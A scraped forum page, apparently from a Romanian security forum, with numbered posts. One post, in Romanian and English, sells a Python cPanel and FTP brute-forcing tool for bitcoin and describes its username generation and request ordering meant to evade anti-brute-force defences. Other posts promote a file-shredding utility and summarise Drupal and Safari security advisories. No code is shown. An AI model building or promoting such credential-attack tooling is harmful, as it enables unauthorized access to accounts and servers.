  21. Se vinde sursa bruter cPanel + FTP facut in python, threaded. Este mult mai avansat decat alte ragalii publice, are anumiti algoritmi de creere a userilor, nu incearca doar pe user de lungime 8 caractere sau chestii de genu.. Se creeaza pana la 50 combinatii de useri, se pot adauga la lista (la inceput sau la final) si useri predefiniti gen www, ftp, admin etc... Brute-ul se face in ordinea user pass ip , pentru a mari timpul dintre requesturi si implicit a evita anumite sisteme de anti-brute. Toate update-urile sunt gratuite si anuntate in acest topic (daca nu se inchide sau ceva). Pretul este de 100$. Accept doar BTC / BTC-e USD code. PM pentru jabber. Mersi. //////ENGLISH Selling threaded python source for cPanel + FTP bruter. More advanced than other public shit bruters, it has certain algorhytms for user generation, it doesn't do the usual 8 character lenght user or stuff like that. It creates up to 50 username combinations, and you can add more predefined at begining or end of users list, users like www, ftp etc... The brute is made in user pass ip order, to increase the time between requests and avoiding certain anti-brute sistems . Price is 100$. Accepting only BTC / BTC-e USD code. PM for jabber id. Thank you.
  22. Zer0 is a user friendly file deletion tool with a high level of security. With Zer0, you'll be able to delete files and to prevent file recovery by a 3rd person. So far, no user reported an efficient method to recover a file deleted by Zer0. Features User friendly HMI : Drag'n'drop, 1 click and the job is done ! High security file deletion algorithm Multithreaded application core : Maximum efficiency without freezing the application. Internationalization support. DOWNLOAD LINK :- KC Softwares
  23. Drupal, one of the widely used open source content management system is recommending its users to update their software to the latest versions 6.35 and 7.35 after the company discovered two moderately critical vulnerabilities that may allow an attacker to hack Drupal websites. According to a security advisory published yesterday, a flaw found in the Drupal core could allow a potential hacker under certain circumstances to bypass security restrictions by forging the password reset URLs. ACCESS BYPASS / PASSWORD RESET URLs VULNERABILITY Successful exploitation of this Access Bypass vulnerability could leverage the hacker to gain unauthorized access to user accounts without knowing their password. This vulnerability is considered as moderately critical in which an attacker can remotely trick a registered user of Drupal based website, such as an administrator, into launching a maliciously crafted URL in an attempt to take control of the target server. AFFECTED DRUPAL WEBSITES The exploitation of the access bypass vulnerability on Drupal 7 website is possible only if the account importing or programmatically editing process results in the password hash in the database being the same for multiple user accounts. The websites running Drupal 6 are at greater risk, because the administrators of the websites have created multiple new user accounts protected by the same password. Moreover, the security vulnerability can also be exploited in the Drupal 6 websites where accounts have been imported or programmatically edited in a way that results in the password hash field in the database being empty for at least for one user account. OPEN REDIRECT VULNERABILITY The affected versions of Drupal CMS are also susceptible to an open redirect vulnerability. Drupal action URLs contain a "destination" parameter in it, which can be used by cyber criminals to redirect users to a third-party location with malicious content. According to the Drupal team, there are multiple URL-related API functions in affected versions of Drupal 6 and 7 which can be used by attackers into passing through external URLs when not required. This could potentially lead to additional open redirect vulnerabilities. The issue is actually serious because Drupal is used to power over 1 billion websites on Internet, which puts Drupal in third place behind the Wordpress and Joomla. Drupal provides a Content management system for websites including MTV, Popular Science, Sony Music, Harvard and MIT. RECOMMENDATIONS Website administrators are strongly recommended to take some necessary steps: Update to the latest version of Drupal core, i.e. Drupal core 6.35 and Drupal core 7.35 Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack. Do not click on links from unknown sources. Do not open email attachments from unknown or untrusted sources. Consider implementing file extension whitelists for allowed e-mail attachments. Source
  24. Apple on Tuesday pushed out new versions of its Safari browser that address 17 security vulnerabilities in the WebKit engine. Safari 8.04, 7.14 and 6.24 patch multiple memory corruption issues in WebKit, Apple said. “These issues were addressed through improved memory handling,” Apple said in its advisory. The advisory is sparse in other details on individual CVEs; Apple said that users visiting a website hosting an exploit could put the browser at risk to remote code execution or a crash. A separate WebKit vulnerability affects the user interface and could open the door to phishing attacks. “A user interface inconsistency existed in Safari that allowed an attacker to misrepresent the URL,” Apple said. “This issue was addressed through improved user interface consistency checks.” This is the second set of Apple patches in the last 10 days. The company took care of the FREAK vulnerability in iOS along with another vulnerability that would allow a hacker to remotely restart a user’s phone via a SMS message. Apple iOS 8.2 also patched a vulnerability in the iCloud keychain function that was the result of several buffer overflows. Source
×
×
  • Create New...